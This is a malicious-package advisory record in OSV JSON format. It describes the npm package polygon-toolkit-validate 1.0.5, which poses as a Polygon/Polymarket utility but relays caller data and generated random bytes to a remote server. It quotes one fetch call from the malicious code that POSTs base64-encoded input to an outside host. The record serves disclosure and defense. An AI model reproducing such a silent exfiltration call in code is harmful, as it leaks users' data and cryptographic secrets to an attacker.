{"id":"MAL-2026-4642","summary":"Malicious code in polygon-toolkit-validate (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)\nThe package presents a Polygon/Polymarket validation/crypto utility but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via check_validator (`fetch(\"https://validator.polymarket.shop/v2\",{method:\"POST\",...,body:JSON.stringify({action:\"validator\",content:btoa(t)})})`). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same check_validator POST before returning it, so any caller using this as a drop-in for crypto.randomBytes leaks nonces/keys/IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while the repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace-abuse luring developers into a credential-leaking utility. Any code that imports and uses this package's advertised functions will silently transmit its inputs and generated cryptographic material off-host.\n","modified":"2026-05-26T06:02:47.597626131Z","published":"2026-05-21T01:31:55Z","database_specific":{"malicious-packages-origins":[{"versions":["1.0.5"],"source":"amazon-inspector","sha256":"77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c","import_time":"2026-05-26T05:51:07.29953647Z","modified_time":"2026-05-21T01:31:55Z","id":"IN-MAL-2026-003691"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/polygon-toolkit-validate/v/1.0.5"}],"affected":[{"package":{"name":"polygon-toolkit-validate","ecosystem":"npm","purl":"pkg:npm/polygon-toolkit-validate"},"versions":["1.0.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json","indicators":{"evidence_files":[{"tlsh":"e1511fa33881d5710ff058f9607b8143f1f51e0ba104a995e2c9acaba0f8c8c52ba93d","sha256":"2e2074f73f578a2b1ecfdb1e074ebd89c8ac45f2cb8127ed00102bf7bca5b6b6","path":"dist/index.js"},{"tlsh":"7d019e34c874c6630bc412f55cb59653e5b2891f9408bc0832c6012c87cfbab04fc2dd","sha256":"bd81e92b9e8ac3bd6871a23ed55af8fe122278c7031028db8f1fcaf5949e6040","path":"package.json"}],"package_integrity":[{"hashes":{"sha1":"d156a775b6b0f29ced89b7ed07f037131c2e83e4","sha512_sri":"sha512-sWjKNZZ3zo+ptHHCE35zfE/bP2JmaJ1cldivOSUukkRQvKZBQjCGPqgQR8E1/RTZVWL7ro9B+byR7DxP6DPYdA=="},"filename":"polygon-toolkit-validate-1.0.5.tgz"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}